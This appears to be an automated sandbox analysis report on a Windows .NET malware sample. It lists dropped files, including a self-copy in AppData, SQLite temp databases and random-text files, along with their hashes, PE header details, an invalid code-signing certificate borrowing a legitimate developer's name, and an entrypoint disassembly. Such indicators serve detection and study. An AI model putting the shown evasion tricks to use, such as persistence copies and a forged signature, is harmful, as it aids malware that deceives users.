                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpDF86.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpDF97.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpDFA7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpDFB8.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpFCE5.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpFCF6.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpFCF7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpFD07.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmpFD43.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.694982189683734
                                                                              Encrypted:false
                                                                              SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                              MD5:E49F84B05A175C231342E6B705A24A44
                                                                              SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                              SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                              SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                              Malicious:false
                                                                              Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                              C:\Users\user\AppData\Local\Temp\tmpFD44.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.700014595314478
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                              Malicious:false
                                                                              Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                              C:\Users\user\AppData\Local\Temp\tmpFD55.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.694982189683734
                                                                              Encrypted:false
                                                                              SSDEEP:24:MggAXr5945qa/jgwHvsjCIShLGmTSIp/6co4rHg+X:MgJXr5+pjBsUhJTSIGA
                                                                              MD5:E49F84B05A175C231342E6B705A24A44
                                                                              SHA1:41B4E74B5F82D72435DFF38DD1B8B6026691CB4E
                                                                              SHA-256:EE0E867E83FE0206F33F009F216D2986AE3903B6F8944FBE2CC36586E5844626
                                                                              SHA-512:84E29127671A2D2539F2E340C3465736F68C5545A256F9C2813B6BF955645A629FD80BCFF7CEC902F07492C1E40C0794C2D3A906DD402BACA5E647BDFA2B88AA
                                                                              Malicious:false
                                                                              Preview:KZWFNRXYKIQQDFEFEKFUFTLSCHHVHHFJVLINSSPODUWFGYCFXENRRFQZQNVRFJLXTKRPVZFZUDBIVIHPJCTZSMJNOWNCQAPYYHLTMHJJYECMUWUKYXMYBEVYHAFCNHVTPHXQKEQMWLDZKOKDMDUORJRRWKHVJLZNSFERFDAFUHPRYSOCWFZCHPEXICNDGFOZLLLNASUKYIOHUBCGSHVHTAAMQFTBUNSBDIPJOCUDVCBYOUPDCATAMJESONSVVDFARQOQHDTKDRVDWNHMPSWQTCDBOSQIMASLDMFOKOIPUFJNASKNMQOVCYYFVCKNWJBVIBCWMYJGLWMAZWJABPWRYFHPZVZTRFLFKJIVQMYASPFSBODYXKEEFHBTFSHZEWSGAGGMSRRYSACIWVPBTHVGVVYONDRAYVOWBYTTLWWPGWQAJDLYFDALUZCIBUOEBMSCKJILYNBNADCKXDVTLOFEMKULPCSYYTTPBZKLBPMPEQZHPJCMRWISRYUKSYBUOCFXUPORADUTYINWCOLTVNYNBVHTATWIAMJBNCYZTMQLJOZXQMVQWJAGLZBDTPNMMKABCUCOYDSRVMYDKVJFRZRLIKSQNEMHUWIXWIACERSGEBQFEQJLXFLCITYZWKHIASCUIPVHOXQGWHFWSXEHOMVVXNFDEKOTOBBAEPJTBOCEJGWYSJBHWDRPPONMLWEDWWLGQVWLLREHLEZFZNEDNRDQMBTZWCUIFLPBHTTQGIEVFRJKMYLHMYUOCAAUGIRMYSCUPKJDFUJBVKKJHICSXHPXWUGXGPHCKBZLZXDCKURFIMZGIDDJWPBHEERWPLLCNTTKZRNYIMGHNYECXBHHHWCVILLPFPVXYOQODPYIIVKTOODIUKCMBBWHUEFORQUJCVYVBOBKKLPQJMOJEUOFUFAAJRTAZTXJJQPOORSRNCQDMHWVYQIGGCMZGYMXIBAKRNOPIPQWJHZEWBBJTYBESJTCCPYZHONYNVOXCBHCXRST

                                                                              C:\Users\user\AppData\Local\Temp\tmpFD56.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):4.700014595314478
                                                                              Encrypted:false
                                                                              SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                              MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                              SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                              SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                              SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                              Malicious:false
                                                                              Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM

                                                                              C:\Users\user\AppData\Roaming\CiENBY.exe

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Category:dropped
                                                                              Size (bytes):706568
                                                                              Entropy (8bit):7.851586551804549
                                                                              Encrypted:false
                                                                              SSDEEP:12288:QPSg4dwyerVbCx3YNAguNN9WSrLuWXSAdVPOgOFHSLWB0io0CJohPCAOkR:2Sg4WrVbCx3YNhuNN9tW/A7OgOkQtC0V
                                                                              MD5:01D452E81B85A3D399A247852F2F5004
                                                                              SHA1:B1B5BB7EDF69875726EA1C627FB0BBEF6215143A
                                                                              SHA-256:88FD2273DBA726F8E93082EEF548564C84EE1F3BE9F69A7D02EF9A3ED7F8EA18
                                                                              SHA-512:D1F62C8A067F9D2A241CC4604883E41AA9860FD09719BA2827DD0F2DE9920411E62B57B9BA7A1E5184736C473BA4D621E31A194224A513DE66A2879131C8F9BB
                                                                              Malicious:true
                                                                              Antivirus:
                                                                              • Antivirus: ReversingLabs, Detection: 61%
                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.................0..x............... ........@.. ....................................@.....................................O.......l................6...........[..p............................................ ............... ..H............text....v... ...x.................. ..`.rsrc...l............z..............@..@.reloc..............................@..B.......................H.......................tv..0.............................................{....*..{....*V.(......}......}....*...0..C........u........6.,0(.....{.....{....o....,.(.....{.....{....o....+..+..*. ..l. )UU.Z(.....{....o....X )UU.Z(.....{....o....X*.0..b........r...p......%..{.......%q.........-.&.+.......o ....%..{.......%q.........-.&.+.......o ....(!...*..(".....(#....r=..prS..psA...($....*..0..].........o%...(&.....,....o'.....+@.o%...((.....,....o'.....+%.o%...().....,....o'.

                                                                              C:\Users\user\AppData\Roaming\CiENBY.exe:Zone.Identifier

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):26
                                                                              Entropy (8bit):3.95006375643621
                                                                              Encrypted:false
                                                                              SSDEEP:3:ggPYV:rPYV
                                                                              MD5:187F488E27DB4AF347237FE461A079AD
                                                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                              Malicious:true
                                                                              Preview:[ZoneTransfer]....ZoneId=0

                                                                              Static File Info

                                                                              General

                                                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                              Entropy (8bit):7.851586551804549
                                                                              TrID:
                                                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                              • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                              • Windows Screen Saver (13104/52) 0.07%
                                                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                                                              • DOS Executable Generic (2002/1) 0.01%
                                                                              File name:PZNfhfaj9O.exe
                                                                              File size:706'568 bytes
                                                                              MD5:01d452e81b85a3d399a247852f2f5004
                                                                              SHA1:b1b5bb7edf69875726ea1c627fb0bbef6215143a
                                                                              SHA256:88fd2273dba726f8e93082eef548564c84ee1f3be9f69a7d02ef9a3ed7f8ea18
                                                                              SHA512:d1f62c8a067f9d2a241cc4604883e41aa9860fd09719ba2827dd0f2de9920411e62b57b9ba7a1e5184736c473ba4d621e31a194224a513de66a2879131c8f9bb
                                                                              SSDEEP:12288:QPSg4dwyerVbCx3YNAguNN9WSrLuWXSAdVPOgOFHSLWB0io0CJohPCAOkR:2Sg4WrVbCx3YNhuNN9tW/A7OgOkQtC0V
                                                                              TLSH:C2E4018133FD5F82DD798BFA29A0A04043F17A1AB965E7994EC261DF25B1F108F60E17
                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...`.................0..x............... ........@.. ....................................@................................

                                                                              File Icon

                                                                              Icon Hash:62ceac86b2968ea2

                                                                              Static PE Info

                                                                              General

                                                                              Entrypoint:0x4a96f6
                                                                              Entrypoint Section:.text
                                                                              Digitally signed:true
                                                                              Imagebase:0x400000
                                                                              Subsystem:windows gui
                                                                              Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                              Time Stamp:0xDCB7B960 [Tue May 6 02:54:24 2087 UTC]
                                                                              TLS Callbacks:
                                                                              CLR (.Net) Version:
                                                                              OS Version Major:4
                                                                              OS Version Minor:0
                                                                              File Version Major:4
                                                                              File Version Minor:0
                                                                              Subsystem Version Major:4
                                                                              Subsystem Version Minor:0
                                                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                              Authenticode Signature

                                                                              Signature Valid:false
                                                                              Signature Issuer:CN=COMODO RSA Code Signing CA, O=COMODO CA Limited, L=Salford, S=Greater Manchester, C=GB
                                                                              Signature Validation Error:The digital signature of the object did not verify
                                                                              Error Number:-2146869232
                                                                              Not Before, Not After
                                                                              • 13/11/2018 00:00:00 08/11/2021 23:59:59
                                                                              Subject Chain
                                                                              • CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
                                                                              Version:3
                                                                              Thumbprint MD5:DABD77E44EF6B3BB91740FA46696B779
                                                                              Thumbprint SHA-1:5B9E273CF11941FD8C6BE3F038C4797BBE884268
                                                                              Thumbprint SHA-256:4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
                                                                              Serial:7C1118CBBADC95DA3752C46E47A27438

                                                                              Entrypoint Preview

                                                                              Instruction
                                                                              jmp dword ptr [00402000h]
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
                                                                              add byte ptr [eax], al
